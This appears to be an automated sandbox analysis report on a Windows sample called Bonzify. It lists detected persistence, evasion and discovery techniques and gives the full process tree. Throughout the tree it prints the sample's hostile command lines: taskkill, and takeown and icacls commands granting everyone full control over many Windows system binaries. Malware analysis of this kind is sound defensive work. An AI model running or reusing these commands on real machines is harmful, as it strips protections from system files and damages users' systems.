Analysis
-
max time kernel
341s -
max time network
302s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
27-11-2024 15:53
Errors
Reason
Machine shutdown
General
-
Target
https://github.com/TheDarkMythos/windows-malware/tree/master/Bonzify
Score
8/10
Malware Config
Signatures
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 6 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Downloads MZ/PE file
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Possible privilege escalation attempt 64 IoCs
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 15 IoCs
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Power Settings 1 TTPs 3 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 3 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Windows directory 64 IoCs
-
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
-
Access Token Manipulation: Create Process with Token 1 TTPs 5 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Program crash 5 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 58 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 11 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Control Panel 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
NTFS ADS 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/TheDarkMythos/windows-malware/tree/master/Bonzify1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0de4cc40,0x7ffd0de4cc4c,0x7ffd0de4cc582⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1732 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:32⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2156,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2324 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4596,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4264 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5056,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5040 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5060,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5224 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5068,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5364 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5076,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5516 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5092,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5664 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4496,i,10907994929691302557,8632875432105183732,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Users\Admin\Desktop\Bonzify.exe"C:\Users\Admin\Desktop\Bonzify.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\KillAgent.bat"2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AgentSvr.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exetakeown /r /d y /f C:\Windows\MsAgent3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\MsAgent /c /t /grant "everyone":(f)3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exeINSTALLER.exe /q2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentCtl.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDPv.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\mslwvtts.dll"3⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentDP2.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentMPx.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentSR.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Windows\msagent\AgentPsh.dll"3⤵
- Loads dropped DLL
-
-
C:\Windows\msagent\AgentSvr.exe"C:\Windows\msagent\AgentSvr.exe" /regserver3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-diskpart_31bf3856ad364e35_10.0.22000.1_none_c970ad52cf16bc2f\diskpart.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-diskpart_31bf3856ad364e35_10.0.22000.1_none_c970ad52cf16bc2f\diskpart.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-diskpart_31bf3856ad364e35_10.0.22000.1_none_c970ad52cf16bc2f\diskpart.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-diskusage_31bf3856ad364e35_10.0.22000.1_none_12679a433ec476cd\diskusage.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-diskusage_31bf3856ad364e35_10.0.22000.1_none_12679a433ec476cd\diskusage.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-diskusage_31bf3856ad364e35_10.0.22000.1_none_12679a433ec476cd\diskusage.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-dpapi-keys_31bf3856ad364e35_10.0.22000.1_none_de6b1af4069aa942\dpapimig.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-dpapi-keys_31bf3856ad364e35_10.0.22000.1_none_de6b1af4069aa942\dpapimig.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-dpapi-keys_31bf3856ad364e35_10.0.22000.1_none_de6b1af4069aa942\dpapimig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-dpiscaling_31bf3856ad364e35_10.0.22000.1_none_dae01b2e9419ebcf\DpiScaling.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-dpiscaling_31bf3856ad364e35_10.0.22000.1_none_dae01b2e9419ebcf\DpiScaling.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-dpiscaling_31bf3856ad364e35_10.0.22000.1_none_dae01b2e9419ebcf\DpiScaling.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-driverquery_31bf3856ad364e35_10.0.22000.1_none_f6bb136dce337547\driverquery.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-driverquery_31bf3856ad364e35_10.0.22000.1_none_f6bb136dce337547\driverquery.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-driverquery_31bf3856ad364e35_10.0.22000.1_none_f6bb136dce337547\driverquery.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-driververifier_31bf3856ad364e35_10.0.22000.1_none_1b04230fd5e53bb5\verifiergui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-driververifier_31bf3856ad364e35_10.0.22000.1_none_1b04230fd5e53bb5\verifiergui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-driververifier_31bf3856ad364e35_10.0.22000.1_none_1b04230fd5e53bb5\verifiergui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exeINSTALLER.exe /q2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll3⤵
- Loads dropped DLL
- Modifies registry class
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll3⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\grpconv.exegrpconv.exe -o3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-e..ageengine-utilities_31bf3856ad364e35_10.0.22000.1_none_3a2434f5fe6af698\esentutl.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-e..ageengine-utilities_31bf3856ad364e35_10.0.22000.1_none_3a2434f5fe6af698\esentutl.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-e..ageengine-utilities_31bf3856ad364e35_10.0.22000.1_none_3a2434f5fe6af698\esentutl.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-e..ortingcompatibility_31bf3856ad364e35_10.0.22000.1_none_5f37ed4d2eae86cf\DWWIN.EXE"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-e..ortingcompatibility_31bf3856ad364e35_10.0.22000.1_none_5f37ed4d2eae86cf\DWWIN.EXE"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-e..ortingcompatibility_31bf3856ad364e35_10.0.22000.1_none_5f37ed4d2eae86cf\DWWIN.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-edp-notify_31bf3856ad364e35_10.0.22000.1_none_8165809779001f16\edpnotify.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-edp-notify_31bf3856ad364e35_10.0.22000.1_none_8165809779001f16\edpnotify.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-edp-notify_31bf3856ad364e35_10.0.22000.1_none_8165809779001f16\edpnotify.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-edp-notify_31bf3856ad364e35_10.0.22000.434_none_26804abdf9690430\edpnotify.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-edp-notify_31bf3856ad364e35_10.0.22000.434_none_26804abdf9690430\edpnotify.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-edp-notify_31bf3856ad364e35_10.0.22000.434_none_26804abdf9690430\edpnotify.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-efs-rekeywiz_31bf3856ad364e35_10.0.22000.1_none_6882f2754501b4c0\rekeywiz.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-efs-rekeywiz_31bf3856ad364e35_10.0.22000.1_none_6882f2754501b4c0\rekeywiz.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-efs-rekeywiz_31bf3856ad364e35_10.0.22000.1_none_6882f2754501b4c0\rekeywiz.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-efs-ui_31bf3856ad364e35_10.0.22000.1_none_570d0ffac0c0516c\efsui.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-efs-ui_31bf3856ad364e35_10.0.22000.1_none_570d0ffac0c0516c\efsui.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-efs-ui_31bf3856ad364e35_10.0.22000.1_none_570d0ffac0c0516c\efsui.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.22000.1_none_810efa0e3f0e1154\wermgr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.22000.1_none_810efa0e3f0e1154\wermgr.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.22000.1_none_810efa0e3f0e1154\wermgr.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\f\WerFault.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\f\WerFault.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\f\WerFault.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\f\WerFaultSecure.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\f\WerFaultSecure.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\f\WerFaultSecure.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\r\WerFault.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\r\WerFault.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\r\WerFault.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\r\WerFaultSecure.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\r\WerFaultSecure.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\r\WerFaultSecure.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\WerFault.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\WerFault.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\WerFault.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\WerFaultSecure.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\WerFaultSecure.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_75821ac4f6866a77\WerFaultSecure.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFault.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFault.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFault.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
